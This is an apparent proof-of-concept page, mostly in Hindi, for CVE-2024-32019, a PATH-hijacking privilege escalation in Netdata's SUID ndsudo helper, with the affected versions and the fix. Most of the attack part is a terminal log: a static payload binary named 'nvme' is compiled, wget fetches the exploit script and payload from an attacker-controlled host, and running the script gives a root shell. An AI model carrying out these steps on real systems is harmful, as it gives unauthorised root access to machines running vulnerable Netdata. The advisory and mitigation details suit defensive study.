
Netdata ndsudo विशेषाधिकार वृद्धि PoC
CVE-2024-32019 Netdata के SUID हेल्पर ndsudo में एक स्थानीय विशेषाधिकार-वृद्धि दोष है, जो स्थानीय उपयोगकर्ता को अविश्वसनीय खोज पथ (PATH हाइजैकिंग) के माध्यम से रूट के रूप में मनमाने प्रोग्राम निष्पादित करने की अनुमति देता है।
यह समस्या इसलिए मौजूद है क्योंकि ndsudo कमांड नामों को प्रतिबंधित करता है, लेकिन उन्हें कॉलर के PATH का उपयोग करके हल करता है, जिससे उपयोगकर्ता एक दुर्भावनापूर्ण बाइनरी को PATH में पहले रख सकता है और ndsudo को उसे रूट विशेषाधिकारों के साथ चलाने दे सकता है।
यह Netdata Agent संस्करणों ≥ v1.45.0 और < v1.45.3, तथा ≥ v1.44.0-60 और < v1.45.0-169 को प्रभावित करता है, और इसका CVSS v3.1 स्कोर 8.8 (उच्च) है।
शमन उपाय v1.45.3 या v1.45.0-169 में अपग्रेड करना है; यह कमजोरी CWE-426 (अविश्वसनीय खोज पथ) से मेल खाती है।
gcc -static payload.c -o nvme -Wall -Werror -Wpedantic
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/CVE-2024-32019.sh
--2025-09-10 23:49:01-- http://192.168.100.7:8000/CVE-2024-32019.sh
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
CVE-2024-32019.sh 100%[==================================================>] 712 --.-KB/s in 0s
2025-09-10 23:49:01 (57.1 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
test@ubuntu:/tmp$ wget http://192.168.100.7:8000/nvme
--2025-09-10 23:49:10-- http://192.168.100.7:8000/nvme
Connecting to 192.168.100.7:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 832552 (813K) [application/octet-stream]
Saving to: ‘nvme’
nvme 100%[==================================================>] 813.04K 1.98MB/s in 0.4s
2025-09-10 23:49:11 (1.98 MB/s) - ‘nvme’ saved [832552/832552]
test@ubuntu:/tmp$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@ubuntu:/tmp#